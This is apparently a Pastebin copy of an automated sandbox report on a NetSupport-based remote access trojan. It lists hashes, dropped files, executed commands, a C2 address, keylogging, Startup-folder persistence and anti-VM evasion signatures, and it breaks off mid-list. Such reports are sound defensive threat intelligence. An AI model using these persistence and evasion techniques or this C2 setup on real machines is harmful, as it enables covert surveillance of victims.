Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: "RAT"
- * MalScore: 10.0
- * File Name: "rat_29b47d1f3d4417b4e50e5b1c0005298b.exe"
- * File Size: 6210712
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "aacadf7b3bfc2ac8a9a342e5372c77218efa9c67602c3a15441094170a5f52d4"
- * MD5: "29b47d1f3d4417b4e50e5b1c0005298b"
- * SHA1: "8c99bbbf3f10ca3a17b66483fd12d05c740e8b72"
- * SHA512: "e0be81aec6e029e31171675609ef0cb9a0ccc8ebefe236d94216be6f55930c3875c5f4212d63afe57375e47877078b782457cdde20150f108d34ce07b9f9fa20"
- * CRC32: "8DDA17C6"
- * SSDEEP: "98304:C2ucSaqk6klTcBu7WoMOfH7fbG5a2nnCHRdhSJTLe6ZRYLIQlrlAN0urueFKJEL:3JJ6klcoBH7fbF2nn++hLe6ssQBAN80h"
- * Process Execution:
- "rat_29b47d1f3d4417b4e50e5b1c0005298b.exe",
- "WinSupport.exe",
- "client32.exe",
- "services.exe",
- "svchost.exe",
- "WmiPrvSE.exe",
- "svchost.exe",
- "svchost.exe",
- "WMIADAP.exe",
- "taskhost.exe",
- "sc.exe",
- "svchost.exe",
- "WerFault.exe",
- "wermgr.exe",
- "svchost.exe"
- * Executed Commands:
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport.exe -pjf74idD",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\client32.exe ",
- "\"C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\GetUserLang.exe\"",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\\\StoreInv.exe",
- "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding",
- "C:\\Windows\\System32\\svchost.exe -k NetworkService",
- "taskhost.exe $(Arg0)",
- "C:\\Windows\\system32\\sc.exe start w32time task_started",
- "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
- "C:\\Windows\\system32\\svchost.exe -k LocalService",
- "\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE wmiadap.exe /F /T /R",
- "C:\\Windows\\system32\\WerFault.exe -u -p 2916 -s 288",
- "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0543f88a\""
- * Signatures Detected:
- "Description": "At least one process apparently crashed during execution",
- "Details":
- "Description": "Attempts to connect to a dead IP:Port (1 unique times)",
- "Details":
- "IP": "5.45.73.63:4151"
- "Description": "A process attempted to delay the analysis task.",
- "Details":
- "Process": "client32.exe tried to sleep 357 seconds, actually delayed analysis time by 0 seconds"
- "Process": "svchost.exe tried to sleep 535 seconds, actually delayed analysis time by 0 seconds"
- "Description": "Starts servers listening on 0.0.0.0:5405",
- "Details":
- "Description": "Reads data out of its own binary image",
- "Details":
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00000000, length: 0x00000007"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00000000, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00000007, length: 0x001ffff0"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00001ff0, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00003fe0, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00005fd0, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00007fc0, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00009fb0, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0000bfa0, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0000df90, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0000ff80, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00011f70, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00013f60, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00015f50, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00017f40, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00019f30, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0001bf20, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0001df10, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0001ff00, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00021ef0, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00023ee0, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00025ed0, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00027ec0, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00029eb0, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0002bea0, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0002de90, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0002fe80, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00031e70, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00033e60, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00035e50, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00037e40, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00039e30, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0003be20, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0003de10, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0003fe00, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00041df0, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00043de0, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00045dd0, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00047dc0, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00049db0, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0004bda0, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0004dd90, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0004fd80, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00051d70, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00053d60, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00055d50, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00057d40, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00059d30, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0005bd20, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0005dd10, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0005fd00, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x00061cf0, length: 0x00002000"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0009a000, length: 0x00000031"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x0009a019, length: 0x00552437"
- "self_read": "process: rat_29b47d1f3d4417b4e50e5b1c0005298b.exe, pid: 1944, offset: 0x005ec490, length: 0x00000008"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00000000, length: 0x00000007"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00000000, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00000007, length: 0x001ffff0"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00001ff0, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00003fe0, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00005fd0, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00007fc0, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00009fb0, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0000bfa0, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0000df90, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0000ff80, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00011f70, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00013f60, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00015f50, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00017f40, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00019f30, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0001bf20, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0001df10, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0001ff00, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00021ef0, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00023ee0, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00025ed0, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00027ec0, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00029eb0, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0002bea0, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0002de90, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0002fe80, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00031e70, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00033e60, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00035e50, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00037e40, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00039e30, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0003be20, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0003de10, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0003fe00, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00041df0, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00043de0, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00045dd0, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00047dc0, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00049db0, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0004bda0, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0004dd90, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0004fd80, length: 0x00002000"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00051800, length: 0x000697ce"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x000d073e, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x000e242e, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x001308ce, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0014553e, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0015811e, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0015a27e, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0015c3de, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0015e53e, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0016069e, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x001627fe, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0016495e, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00166abe, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00168c1e, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00168d8e, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0016cabe, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0016d03e, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0016d1ae, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0017324e, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0017379e, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0017680e, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0017f0de, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0018315e, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00188d9e, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0018acfe, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0029d09e, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x002a41de, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x002a6cee, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x002b84ae, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x003bcace, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x003c8f7e, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x003d4efe, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x003d6fce, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x003d8dbe, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x003dabee, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x003de07e, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x003e54be, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x003e85fe, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x003fd6fe, length: 0x00000070"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x00427e9e, length: 0x00000080"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0042b53e, length: 0x00000080"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0057c35e, length: 0x00000030"
- "self_read": "process: WinSupport.exe, pid: 1276, offset: 0x0057c39e, length: 0x00000050"
- "Description": "A process created a hidden window",
- "Details":
- "Process": "svchost.exe -> \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE"
- "Description": "Drops a binary and executes it",
- "Details":
- "binary": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\client32.exe"
- "binary": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport.exe"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- "suspicious_request": "http://5.45.73.63:4151/http://5.45.73.63/fakeurl.htm"
- "suspicious_request": "http://geo.netsupportsoftware.com/location/loca.asp"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://5.45.73.63:4151/http://5.45.73.63/fakeurl.htm"
- "url": "http://geo.netsupportsoftware.com/location/loca.asp"
- "Description": "Sniffs keystrokes",
- "Details":
- "SetWindowsHookExA": "Process: client32.exe(1392)"
- "Description": "Queries information on disks, possibly for anti-virtualization",
- "Details":
- "Description": "Attempts to restart the guest VM",
- "Details":
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 13453644 times"
- "Description": "Installs itself for autorun at Windows startup",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini.lnk"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini.lnk"
- "Description": "Creates a hidden or system file",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\AudioCapture.dll"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\clhook4.dll"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\client32.exe"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\client32.ini"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\Control.kbd"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\CryptPak.dll"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\DBI.EXE"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\gdihook5.dll"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\gdihook5.INF"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\gdihook5.sys"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\HTCTL32.DLL"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\IPBR32.DLL"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\IPCTL32.DLL"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\msvcr100.dll"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBBR32.DLL"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\Nbctl32.dll"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA0.DLL"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA1.DLL"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA2.DLL"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA3.DLL"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA4.DLL"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA5.DLL"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA6.DLL"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA7.DLL"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\nskbfltr.inf"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\nskbfltr.sys"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NSM.ini"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NSM.LIC"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\nsmexec.exe"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\nspscr.inf"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\nspscr.sys"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NSToast.exe"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\pcicapi.dll"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\pcicfgui.exe"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\PCICHEK.DLL"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\PCICL32.DLL"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\pciconn.exe"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\pcigina.dll"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\PCIHOOKS.DLL"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\PCIinv.dll"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\PCIMON.DLL"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\pcimonhook.dll"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\PCIMSG.DLL"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\pcisys.sys"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\PCIVDD.DLL"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\pscrinst.dll"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\remcmdstub.exe"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\shfolder.dll"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\TCBR32.DLL"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\TCCTL32.DLL"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\VolumeControlWXP.DLL"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\WdfCoInstaller01005.dll"
- "file": "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport"
- "Description": "Retrieves Windows ProductID, probably to fingerprint the sandbox",
- "Details":
- "Description": "File has been identified by 17 Antiviruses on VirusTotal as malicious",
- "Details":
- "K7GW": "Riskware ( 0040eff71 )"
- "K7AntiVirus": "Riskware ( 0040eff71 )"
- "Invincea": "heuristic"
- "Kaspersky": "not-a-virus:RemoteAdmin.Win32.NetSup.i"
- "NANO-Antivirus": "Trojan.Win32.KeyLogger.fteyzh"
- "Paloalto": "generic.ml"
- "Sophos": "Generic PUA IM (PUA)"
- "DrWeb": "Trojan.KeyLogger.41051"
- "McAfee-GW-Edition": "BehavesLike.Win32.AdwareLinkury.tc"
- "Trapmine": "malicious.high.ml.score"
- "FireEye": "Generic.mg.29b47d1f3d4417b4"
- "Cyren": "W32/S-deaeb957!Eldorado"
- "Microsoft": "Trojan:Win32/Fuerboos.C!cl"
- "Acronis": "suspicious"
- "Cylance": "Unsafe"
- "CrowdStrike": "win/malicious_confidence_80% (W)"
- "Qihoo-360": "Win32/Virus.RemoteAdmin.f8d"
- "Description": "Checks the presence of disk drives in the registry, possibly for anti-virtualization",
- "Details":
- "Description": "Checks the system manufacturer, likely for anti-virtualization",
- "Details":
- "Description": "Detects VirtualBox through the presence of a file",
- "Details":
- "file": "C:\\Program Files\\Oracle\\VirtualBox Guest Additions\\uninst.exe"
- "Description": "Detects VirtualBox through the presence of a registry key",
- "Details":
- "Description": "Collects information to fingerprint the system",
- "Details":
- * Started Service:
- "TapiSrv",
- "WerSvc",
- "W32Time"
- * Mutexes:
- "DefaultTabtip-MainUI",
- "CicLoadWinStaWinSta0",
- "Local\\MSCTF.CtfMonitorInstMutexDefault1",
- "Local\\WERReportingForProcess2916",
- "Global\\\\xe5\\x88\\x90\\xc2\\xb1",
- "Global\\\\xed\\x95\\xb0\\xc7\\x90",
- "WERUI_BEX64-eb71ef964c95de5826f5dbf6417783430b96dd1",
- "Global\\ADAP_WMI_ENTRY",
- "Global\\RefreshRA_Mutex",
- "Global\\RefreshRA_Mutex_Lib",
- "Global\\RefreshRA_Mutex_Flag"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\__tmp_rar_sfx_access_check_18222468",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport.exe",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\__tmp_rar_sfx_access_check_18223250",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\AudioCapture.dll",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\clhook4.dll",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\client32.exe",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\client32.ini",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\Control.kbd",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\CryptPak.dll",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\DBI.EXE",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\gdihook5.dll",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\gdihook5.INF",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\gdihook5.sys",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\HTCTL32.DLL",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\IPBR32.DLL",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\IPCTL32.DLL",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\msvcr100.dll",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBBR32.DLL",
